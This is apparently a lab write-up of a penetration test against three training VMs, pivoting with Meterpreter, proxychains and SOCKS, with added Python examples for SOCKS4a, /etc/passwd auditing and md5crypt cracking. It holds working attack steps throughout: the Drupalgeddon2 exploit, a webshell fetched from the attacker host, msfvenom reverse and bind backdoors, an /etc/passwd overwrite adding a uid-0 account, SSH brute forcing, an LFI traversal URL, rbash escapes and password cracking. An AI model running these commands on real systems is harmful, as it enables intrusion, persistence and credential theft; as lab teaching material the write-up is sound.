Pentest With Meterpreter

A belated write-up

Penetration Test Report

2019/1/28 16:49:43


Task Plan

Scope: three servers running as virtual machines
Objective: obtain root on every server

Targets

  • A1 hackNos(Ubuntu)
    IP.0:192.168.31.132
    IP.1:Unknown

  • A2 lin.security(Ubuntu)
    IP.0:Unknown
    IP.1:Unknown

  • A3 hackNos-2(Ubuntu)
    IP.0:Unknown

Attacker

  • B Attacker(Kali)
    IP.0:192.168.31.10

Network layout:
B can talk to A1
A1 can talk to B and A2
A2 can talk to A1 (A3 turns out to be reachable only from A2, see below)

hackNos

Port Scan

Scan A1's ports with Nmap:

nmap -sV -p 1-1000 -T 5 -v -A -n 192.168.31.132

Nmap scan report for 192.168.31.132
Host is up (0.011s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a5:a5:17:70:4d:be:48:ad:ba:64:c1:07:a0:55:03:ea (RSA)
| 256 f2:ce:42:1c:04:b8:99:53:95:42:ab:89:22:66:9e:db (ECDSA)
|_ 256 4a:7d:15:65:83:af:82:a3:12:02:21:1c:23:49:fb:e9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Web Path Enumeration

dirb http://192.168.31.132 -w

Enumerate web directories with dirb (-w keeps it going past warnings):

==> DIRECTORY: http://192.168.31.132/drupal/ 

The web server hosts a Drupal install.

Exploitation

A search shows that this Drupal install is affected by the Drupalgeddon2 remote code execution bug (CVE-2018-7600); clone a public PoC:
git clone https://github.com/dreadlocked/Drupalgeddon2.git

Run the exploit against A1 (it needs Ruby and the highline gem):

apt install ruby
gem install highline
ruby drupalgeddon2.rb http://192.168.31.132/drupal/

Shell obtained (running as the web server user).

Privilege Escalation

Generate a webshell locally (password "pass"):

weevely generate pass she.php

Start a local web server in the same directory to serve it:
python -m SimpleHTTPServer 8000 &

Fetch the webshell on A1 with wget from the shell obtained above; the file has to land in the Drupal directory for the URL below to work:
wget http://192.168.31.10:8000/she.php

Connect to the webshell:
weevely http://192.168.31.132/drupal/she.php pass

Check system information (i686, so the payload chosen below is 32-bit):

uname -a
Linux hackNos 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:01:15 UTC 2019 i686 i686 i686 GNU/Linux

Generate a Meterpreter backdoor matching the 32-bit kernel above and stage it:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.31.10 LPORT=1234 -e x86/shikata_ga_nai -i 11 -f elf > msf.elf

Upload the backdoor through the webshell (weevely module commands are prefixed with a colon):
:file_upload /root/software/msf.elf /var/www/html/drupal/msf.elf

Start the Metasploit handler:

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.31.10
set LPORT 1234
run

Run the backdoor from the webshell on A1:

chmod +x msf.elf
./msf.elf

Drop from Meterpreter to a system shell and upgrade it to a PTY-backed bash:

meterpreter > shell
python3 -c 'import pty; pty.spawn("/bin/bash")'

List root-owned SUID binaries:

find / -user root -perm -4000 -print 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/i386-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/pkexec
/usr/bin/newgidmap
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/newuidmap
/usr/bin/wget
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
/bin/ping6
/bin/umount
/bin/ntfs-3g
/bin/mount
/bin/ping
/bin/su
/bin/fusermount

wget is SUID root here. Because it runs with root's effective uid, its -O option can write to any path on the system, which is a file-write primitive good enough to replace /etc/passwd.

Modify /etc/passwd indirectly: pull it down through the webshell, append a uid-0 account with a known DES crypt(3) hash, and write it back with the SUID wget. Lines prefixed "hackNos:" run in weevely on A1, the rest run locally in the directory served on port 8000. DES crypt uses only the first two characters of the salt, which is why the hash starts with "ad":

hackNos: :file_download /etc/passwd passwd
perl -le 'print crypt("hackforfun","addedsalt")'
adWo3GnVnKzuU
echo 'test:adWo3GnVnKzuU:0:0::/root:/bin/bash' >> passwd
hackNos: wget http://192.168.31.10:8000/passwd -O /etc/passwd

Switch to the new account in the bash shell:

su test
hackforfun
id
uid=0(root) gid=0(root) groups=0(root)

Check A1's network interfaces from Meterpreter:

ifconfig

Interface 1
============
Name : lo
Hardware MAC : 00:00:00:00:00:00
MTU : 65536
Flags : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::


Interface 2
============
Name : enp0s3
Hardware MAC : 08:00:27:7d:4c:83
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.31.132
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a00:27ff:fe7d:4c83
IPv6 Netmask : ffff:ffff:ffff:ffff::
IPv6 Address : fe80::a00:27ff:fe7d:4c83
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface 3
============
Name : enp0s8
Hardware MAC : 08:00:27:65:bd:8b
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.56.109
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a00:27ff:fe65:bd8b
IPv6 Netmask : ffff:ffff:ffff:ffff::

A1 has a second interface on 192.168.56.0/24.

Add a route for that subnet through the Meterpreter session:

run autoroute -s 192.168.56.0/24
run autoroute -p

Active Routing Table
====================

Subnet Netmask Gateway
------ ------- -------
192.168.56.0 255.255.255.0 Session 1

Scan the internal subnet from MSF:

use auxiliary/scanner/discovery/arp_sweep 
set RHOSTS 192.168.56.0/24
set THREADS 20
run

[+] 192.168.56.103 appears to be up (CADMUS COMPUTER SYSTEMS)

Internal host A2 found.

Caveat: arp_sweep sends raw ARP frames from the attacker's own interfaces; it does not traverse a Meterpreter route, so it only finds hosts on a segment the Kali box is directly attached to (the vendor string comes from the MAC address, which is layer-2 information). For discovery through the pivot use post/multi/gather/ping_sweep on the session, or auxiliary/scanner/portscan/tcp with RHOSTS set to the routed subnet.

Start a SOCKS proxy in MSF so that local tools can use the route:

use auxiliary/server/socks4a
set srvport 9999
run

Point proxychains at it:

vim /etc/proxychains.conf
socks4 192.168.31.10 9999
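Everything that crosses this pivot is one SOCKS CONNECT request followed by a plain TCP byte stream, which is why nmap has to be run with -sT and -Pn through proxychains. The following Python is an added example, not code from the original post or from Metasploit or proxychains: it builds and parses the SOCKS4a CONNECT request that proxychains emits for every connection, and runs it against a stand-in proxy (a socketpair on localhost, a constructed routed set containing 192.168.56.103, and a constructed SSH banner) that grants only hosts in its routing table, the way the route added with autoroute decides what the Metasploit proxy can reach.

```python
"""SOCKS4a CONNECT exchange between a proxychains-style client and a
socks4a-style proxy. Added example; not code from the original post or
from Metasploit/proxychains. The proxy is a stand-in that grants only
hosts in a constructed "routed" set; nothing leaves the local machine.
"""
import socket
import struct
import threading

SOCKS_VERSION = 4
CMD_CONNECT = 1          # the only command proxychains needs: no UDP, ICMP or ARP
REPLY_GRANTED = 0x5A
REPLY_REJECTED = 0x5B


def build_socks4a_connect(host: str, port: int, userid: bytes = b"") -> bytes:
    """Build a SOCKS4 CONNECT request; non-IP hosts use the 4a extension.

    Plain SOCKS4 carries a 4-byte IPv4 address, so the client must resolve
    names itself. SOCKS4a sets DSTIP to 0.0.0.x and appends the hostname,
    so the proxy on the pivot side resolves it instead.
    """
    try:
        dst_ip = socket.inet_aton(host)
        trailer = b""
    except OSError:
        dst_ip = b"\x00\x00\x00\x01"
        trailer = host.encode() + b"\x00"
    header = struct.pack("!BBH4s", SOCKS_VERSION, CMD_CONNECT, port, dst_ip)
    return header + userid + b"\x00" + trailer


def parse_socks4a_request(data: bytes) -> dict:
    """Parse a CONNECT request the way the proxy does."""
    if len(data) < 9 or data[0] != SOCKS_VERSION:
        raise ValueError("not a SOCKS4 request")
    version, cmd, port, dst_ip = struct.unpack("!BBH4s", data[:8])
    userid, _, rest = data[8:].partition(b"\x00")
    if dst_ip[:3] == b"\x00\x00\x00" and dst_ip[3] != 0:   # 4a form: hostname follows
        host = rest.partition(b"\x00")[0].decode()
    else:
        host = socket.inet_ntoa(dst_ip)
    return {"version": version, "cmd": cmd, "port": port, "host": host, "userid": userid}


def build_reply(granted: bool) -> bytes:
    """8-byte reply: VN=0, CD=0x5A granted / 0x5B rejected; port and IP unused."""
    code = REPLY_GRANTED if granted else REPLY_REJECTED
    return struct.pack("!BBH4s", 0, code, 0, b"\x00" * 4)


def parse_reply(data: bytes) -> bool:
    vn, cd, _, _ = struct.unpack("!BBH4s", data[:8])
    if vn != 0:
        raise ValueError("bad SOCKS4 reply")
    return cd == REPLY_GRANTED


def _recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed")
        buf += chunk
    return buf


def fake_proxy(conn: socket.socket, routed: set) -> None:
    """Stand-in for auxiliary/server/socks4a: grant CONNECT only to routed hosts.

    After granting, it plays a constructed SSH banner so the client sees that
    what follows the handshake is an ordinary byte stream.
    """
    req = parse_socks4a_request(conn.recv(1024))
    ok = req["cmd"] == CMD_CONNECT and req["host"] in routed
    conn.sendall(build_reply(ok))
    if ok:
        conn.sendall(b"SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3\r\n")
    conn.close()


def connect_through_proxy(host: str, port: int, routed: set) -> tuple:
    """Client side, i.e. what proxychains does for each nmap -sT connection.
    Returns (granted, first bytes received from the target)."""
    client, proxy = socket.socketpair()
    worker = threading.Thread(target=fake_proxy, args=(proxy, routed))
    worker.start()
    client.sendall(build_socks4a_connect(host, port, b"kali"))
    granted = parse_reply(_recv_exact(client, 8))
    banner = client.recv(1024) if granted else b""
    client.close()
    worker.join()
    return granted, banner


if __name__ == "__main__":
    routed = {"192.168.56.103"}          # constructed: the subnet autoroute added
    print(connect_through_proxy("192.168.56.103", 22, routed))
    print(connect_through_proxy("192.168.56.1", 22, routed))
```

A host outside the routed set is rejected at the handshake, which is exactly what nmap reports as "closed" or "filtered" when the route is missing; and because the request format has no room for anything but a TCP destination, SYN scans, ICMP pings and ARP sweeps never reach the proxy at all.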

lin.security

Port Scan

Scan A2 with Nmap through proxychains. A SOCKS proxy only carries complete TCP connections, so the scan must be -sT (connect scan) with -Pn (no ICMP or SYN host discovery); the OS-detection and traceroute parts of -A rely on raw packets that bypass the proxy and yield nothing here:

proxychains nmap -sT -Pn -v -T5 -A 192.168.56.103

Nmap scan report for 192.168.56.103
Host is up (0.0048s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 7a:9b:b9:32:6f:95:77:10:c0:a0:80:35:34:b1:c0:00 (RSA)
| 256 24:0c:7a:82:78:18:2d:66:46:3b:1a:36:22:06:e1:a1 (ECDSA)
|_ 256 b9:15:59:78:85:78:9e:a5:e6:16:f6:cf:96:2d:1d:36 (ED25519)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 36117/tcp mountd
| 100005 1,2,3 36311/udp mountd
| 100005 1,2,3 50621/tcp6 mountd
| 100005 1,2,3 58468/udp6 mountd
| 100021 1,3,4 36071/udp nlockmgr
| 100021 1,3,4 38529/tcp6 nlockmgr
| 100021 1,3,4 41451/udp6 nlockmgr
| 100021 1,3,4 41509/tcp nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 04:02
Completed NSE at 04:02, 0.00s elapsed
Initiating NSE at 04:02
Completed NSE at 04:02, 0.00s elapsed
Initiating NSE at 04:02
Completed NSE at 04:02, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.88 seconds

SSH and NFS are exposed.

Exploitation

NFS mount
Try to mount A2's exported /home/peter on A1. Editing /etc/exports and restarting rpcbind/nfs, as done below, configures an NFS server; on the client side (A1) those steps have no effect on the mount. What matters is showmount -e, which shows /home/peter exported to everyone:

apt-get install nfs-common
vim /etc/exports
/share1 *(sync,ro) 192.168.56.103(sync,rw)
systemctl restart rpcbind
systemctl restart nfs
showmount -e 192.168.56.103
Export list for 192.168.56.103:
/home/peter *
mkdir /mnt/share1
mount -t nfs 192.168.56.103:/home/peter /mnt/share1
cd /mnt/share1
ls

The mount failed.

RPCbind
No exploit that yields a shell was found.

SSH

proxychains hydra -V -I -f -t 64 -L user -P pass ssh://192.168.56.103:22

[22][ssh] host: 192.168.56.103 login: bob password: secret

Account bob obtained. Note that -t 64 is too aggressive for SSH: sshd limits concurrent unauthenticated connections (MaxStartups), so excess parallel tasks fail without being tried and produce false negatives. hydra itself recommends -t 4 for the ssh module.

Privilege Escalation

From A1, SSH into A2 as bob, escalate with sudo, and append a uid-0 account (the kernel is x86_64, which decides the payload architecture below):

ssh bob@192.168.56.103
sudo -i
secret
perl -le 'print crypt("hackforfun","addedsalt")'
adWo3GnVnKzuU
echo 'test:adWo3GnVnKzuU:0:0::/root:/bin/bash' >> /etc/passwd
exit
exit
ssh test@192.168.56.103
hackforfun
uname -a
Linux linsecurity 4.15.0-70-generic #79-Ubuntu SMP Tue Nov 12 10:36:11 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

Build a Meterpreter backdoor. A2 cannot reach B directly, so a bind payload is used: the handler connects out to A2, and that connection is carried over the route through session 1. The target is x86_64, so the payload must be x64, and x86/shikata_ga_nai cannot encode an x64 payload (msfvenom refuses the architecture mismatch); use an x64 encoder such as x64/xor, or no encoder at all. RHOST is a handler option, not a payload-generation option, so it is not needed here:

msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=2345 -e x64/xor -i 11 -f elf > msf2.elf

Upload the backdoor to A2 with scp through proxychains (test has uid 0, so /root is writable):
proxychains scp msf2.elf test@192.168.56.103:/root/msf2.elf

Run the backdoor on A2 (lowercase +x; +X only affects directories and files that are already executable):

chmod +x msf2.elf
./msf2.elf &

Then start the handler; its connection to 192.168.56.103:2345 goes through the route added above:

use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set RHOST 192.168.56.103
set LPORT 2345
run

Shell obtained. Check A2's interfaces from Meterpreter:

ifconfig

Interface 1
============
Name : lo
Hardware MAC : 00:00:00:00:00:00
MTU : 65536
Flags : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::


Interface 2
============
Name : enp0s3
Hardware MAC : 08:00:27:d8:9f:d6
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.56.103
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a00:27ff:fed8:9fd6
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface 3
============
Name : enp0s8
Hardware MAC : 08:00:27:be:f1:93
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.156.5
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a00:27ff:febe:f193
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface 4
============
Name : docker0
Hardware MAC : 02:42:f4:43:ba:1b
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 172.17.0.1
IPv4 Netmask : 255.255.0.0

A2 has a further interface on 192.168.156.0/24 (docker0 is a local bridge on A2 and not a new network).

Add a route for it through the new session:

run autoroute -s 192.168.156.0/24
run autoroute -p

Active Routing Table
====================

Subnet Netmask Gateway
------ ------- -------
192.168.56.0 255.255.255.0 Session 1
192.168.156.0 255.255.255.0 Session 2

Scan the new subnet from MSF. The same arp_sweep caveat applies: it only sees this segment if Kali is attached to it; for discovery over the route, use post/multi/gather/ping_sweep on session 2 or a routed auxiliary/scanner/portscan/tcp:

use auxiliary/scanner/discovery/arp_sweep 
set RHOSTS 192.168.156.0/24
set THREADS 20
run

[+] 192.168.156.6 appears to be up (CADMUS COMPUTER SYSTEMS)

Internal host A3 found.


hackNos-2

Port Scan

Scan A3 through proxychains. A SOCKS proxy cannot carry the raw packets behind the MAC-address and OS-guess lines in the output below; those only appear when the scanner shares a layer-2 segment with the target, so only the TCP port and service results should be read as proxy-derived:

proxychains nmap -sT -Pn -v -T5 -A 192.168.156.6

Nmap scan report for 192.168.156.6
Host is up (0.00095s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 94:36:4e:71:6a:83:e2:c1:1e:a9:52:64:45:f6:29:80 (RSA)
| 256 b4:ce:5a:c3:3f:40:52:a6:ef:dc:d8:29:f3:2c:b5:d1 (ECDSA)
|_ 256 09:6c:17:a1:a3:b4:c7:78:b9:ad:ec:de:8f:64:b1:7b (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 08:00:27:D8:5B:21 (Oracle VirtualBox virtual NIC)
Aggressive OS guesses: Linux 2.6.32 (96%), Linux 3.2 - 4.9 (96%), Netgear ReadyNAS 2100 (RAIDiator 4.2.24) (96%), Linux 2.6.32 - 3.10 (96%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Netgear ReadyNAS device (RAIDiator 4.2.21 - 4.2.27) (94%), Linux 2.6.32 - 2.6.35 (94%), Linux 2.6.32 - 3.5 (94%)

Web Path Enumeration

dirb http://192.168.156.6 -w

---- Scanning URL: http://192.168.156.6/ ----
+ http://192.168.156.6/index.html (CODE:200|SIZE:10918)
+ http://192.168.156.6/server-status (CODE:403|SIZE:278)
==> DIRECTORY: http://192.168.156.6/tsweb/

---- Entering directory: http://192.168.156.6/tsweb/ ----
+ http://192.168.156.6/tsweb/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.156.6/tsweb/wp-admin/
==> DIRECTORY: http://192.168.156.6/tsweb/wp-content/

Exploitation

Enumerate WordPress users with wpscan:

proxychains wpscan --url http://192.168.156.6/tsweb/ --enumerate u

[i] User(s) Identified:

[+] user
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://192.168.156.6/tsweb/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

A user named "user" exists. Next, enumerate plugins:

proxychains wpscan --url http://192.168.156.6/tsweb/ --enumerate p

[i] Plugin(s) Identified:

[+] gracemedia-media-player
| Location: http://192.168.156.6/tsweb/wp-content/plugins/gracemedia-media-player/
| Latest Version: 1.0 (up to date)
| Last Updated: 2013-07-21T15:09:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.0 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.156.6/tsweb/wp-content/plugins/gracemedia-media-player/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.156.6/tsweb/wp-content/plugins/gracemedia-media-player/readme.txt

The gracemedia-media-player plugin, version 1.0, is installed.

A search turns up a local file inclusion in this plugin (CVE-2019-9618): the cfg parameter of ajax_controller.php is included without sanitisation, so a directory-traversal value reads arbitrary files. Requesting /etc/passwd:
http://192.168.156.6/tsweb/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd

Two lines in the result matter:

  • rohit:x:1000:1000:hackNos:/home/rohit:/bin/bash
  • flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/:1001:1003::/home/flag:/bin/rbash

The flag account's password hash sits in /etc/passwd itself rather than in /etc/shadow, so anyone who can read the file (here, through the LFI) gets a $1$ md5crypt hash to crack offline.
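Both /etc/passwd conditions this write-up leans on (the uid-0 "test" user appended on A1 and A2, and flag's hash exposed by the LFI) are things a parser of the file can flag. The Python below is an added example, not from the original post; SAMPLE_PASSWD is constructed from the lines quoted above plus ordinary filler entries, and the finding labels and the hash_kind names are this example's own (they follow john's --format names).

```python
"""Audit an /etc/passwd for an extra uid-0 login and for a real password
hash stored in the passwd field instead of "x". Added example; not from
the original post. SAMPLE_PASSWD is constructed from the lines quoted in
the write-up plus ordinary filler entries.
"""
from dataclasses import dataclass
from typing import Optional
import re
import sys

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
rohit:x:1000:1000:hackNos:/home/rohit:/bin/bash
flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/:1001:1003::/home/flag:/bin/rbash
test:adWo3GnVnKzuU:0:0::/root:/bin/bash
"""

# password-field values that are not hashes: deferred to /etc/shadow, or locked
SHADOW_OR_LOCKED = {"x", "*", "!", "!!", "*NP*"}
DES_CRYPT_RE = re.compile(r"^[./0-9A-Za-z]{13}$")   # traditional crypt(3): 2-char salt + 11
HASH_PREFIXES = {"$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt", "$y$": "yescrypt"}


@dataclass
class PasswdEntry:
    name: str
    passwd: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text: str) -> list:
    """Parse passwd(5) lines; a malformed line is an error, not something to skip."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 colon-separated fields, got {len(fields)}")
        name, passwd, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, passwd, int(uid), int(gid), gecos, home, shell))
    return entries


def hash_kind(passwd_field: str) -> Optional[str]:
    """Name the hash type (john --format value) if the field holds a hash, else None."""
    if passwd_field == "" or passwd_field in SHADOW_OR_LOCKED:
        return None
    for prefix, kind in HASH_PREFIXES.items():
        if passwd_field.startswith(prefix):
            return kind
    if DES_CRYPT_RE.match(passwd_field):
        return "descrypt"
    return "unknown"


def audit(entries: list) -> list:
    """Return (user, finding) pairs for the conditions exploited in the write-up."""
    findings = []
    for e in entries:
        if e.uid == 0 and e.name != "root":
            findings.append((e.name, "extra uid 0 account"))
        if e.passwd == "":
            findings.append((e.name, "empty password field, login without a password"))
        kind = hash_kind(e.passwd)
        if kind:
            findings.append((e.name, f"password hash stored in /etc/passwd ({kind}); world-readable, crackable offline"))
    return findings


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_PASSWD
    for user, finding in audit(parse_passwd(text)):
        print(f"{user}: {finding}")
```

Run it against a real file with the path as the first argument; on the sample it reports test twice (uid 0 and a DES hash) and flag once (md5crypt), while root and the shadow-backed accounts are silent.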

Privilege Escalation

Crack it with john and a wordlist (on Kali the list lives under /usr/share/wordlists/):

echo '$1$flag$vqjCxzjtRc7PofLYS2lWf/' > passwd
john --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt-long passwd
john --show passwd
topsecret

Log in as flag:

proxychains ssh flag@192.168.156.6
topsecret

The login shell is rbash, which blocks most of what is needed next, so break out to bash. Any of these works:

python -c 'import os; os.system("/bin/bash")'
perl -e 'exec "/bin/bash";'
awk 'BEGIN {system("/bin/bash")}'

All three succeed.

A direct sudo attempt as flag fails.

Searching the box for credentials turns up /var/backups/passbkp/md5-hash:

cat /var/backups/passbkp/md5-hash
$1$rohit$01Dl0NQKtgfeL08fGrggi0

This is rohit's password hash.

Crack it with john:

echo '$1$rohit$01Dl0NQKtgfeL08fGrggi0' > passwd2
john --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt-long passwd2
john --show passwd2
!%hack41
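What john does with --format=md5crypt for the two hashes above (flag's and rohit's) fits in a few dozen lines. The Python below is an added example, not code from the original post or from John the Ripper: it implements md5crypt as in the original C algorithm and checks both hashes against WORDLIST, which is a constructed stand-in for rockyou.txt. The fixed 1000 MD5 rounds and absence of any memory cost are why $1$ hashes fall quickly to a dictionary.

```python
"""md5crypt ($1$) in pure Python plus a wordlist check, the computation
john runs for --format=md5crypt. Added example; not from the original post
or from John the Ripper. WORDLIST is constructed; the two hashes are the
ones read off hackNos-2 in the write-up.
"""
import hashlib
from typing import Optional

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value: int, count: int) -> str:
    """crypt(3)-style base64: least-significant 6 bits first, no padding."""
    out = []
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def md5crypt(password: str, salt: str) -> str:
    """Poul-Henning Kamp's md5crypt: 1000 MD5 rounds, salt of at most 8 chars."""
    pw = password.encode()
    sl = salt[:8].encode()
    magic = b"$1$"
    ctx = hashlib.md5(pw + magic + sl)
    alt = hashlib.md5(pw + sl + pw).digest()
    for i in range(len(pw), 0, -16):          # mix in len(pw) bytes of the alt digest
        ctx.update(alt[:min(16, i)])
    i = len(pw)
    while i:                                  # one byte per bit of len(pw)
        ctx.update(b"\x00" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()
    for i in range(1000):                     # fixed work factor: the weakness
        rnd = hashlib.md5()
        rnd.update(pw if i & 1 else final)
        if i % 3:
            rnd.update(sl)
        if i % 7:
            rnd.update(pw)
        rnd.update(final if i & 1 else pw)
        final = rnd.digest()
    out = ""
    for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        out += _to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
    out += _to64(final[11], 2)
    return f"$1${sl.decode()}${out}"


def parse_md5crypt(hash_str: str) -> tuple:
    """Split "$1$salt$hash" into (salt, hash) and validate the id."""
    parts = hash_str.split("$")
    if len(parts) != 4 or parts[0] != "" or parts[1] != "1":
        raise ValueError("not an md5crypt hash")
    return parts[2], parts[3]


def crack(hash_str: str, wordlist) -> Optional[str]:
    """Return the first candidate whose md5crypt matches the hash, else None."""
    salt, _ = parse_md5crypt(hash_str)
    for word in wordlist:
        if md5crypt(word, salt) == hash_str:
            return word
    return None


# Constructed stand-in for rockyou.txt
WORDLIST = ["123456", "password", "hackforfun", "topsecret", "letmein", "!%hack41"]
FLAG_HASH = "$1$flag$vqjCxzjtRc7PofLYS2lWf/"
ROHIT_HASH = "$1$rohit$01Dl0NQKtgfeL08fGrggi0"

if __name__ == "__main__":
    for h in (FLAG_HASH, ROHIT_HASH):
        print(h, "->", crack(h, WORDLIST))
```

The salt is read from the hash itself, so a per-hash dictionary run is all that is needed; with a real wordlist the only difference from john is speed.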

Switch to rohit and escalate with sudo:

su rohit
!%hack41
sudo -i
!%hack41
id
uid=0(root) gid=0(root) groups=0(root)

Approaches to internal-network pivoting

proxychains + meterpreter
After taking a host, upload a Meterpreter payload, add a route through the session, and forward local tools through the MSF SOCKS proxy. AV evasion of the payload and keeping the session alive both need attention. The advantage of Meterpreter is that once the route exists, MSF modules can attack the internal network directly, and the session brings many useful post-exploitation features with it.

proxychains + earthworm
Similar, but only a traffic-forwarding tool (EW) is uploaded rather than a full backdoor, so AV evasion matters less, although leaving a proxy service running on the target is still a risk. For multi-hop pivoting, one proxy chain per hop has to be set up, so keep a record of each hop's address and port.

Run nmap with -n to skip DNS resolution; otherwise it attempts a reverse lookup for every target, which is slow through a proxy and only adds noise.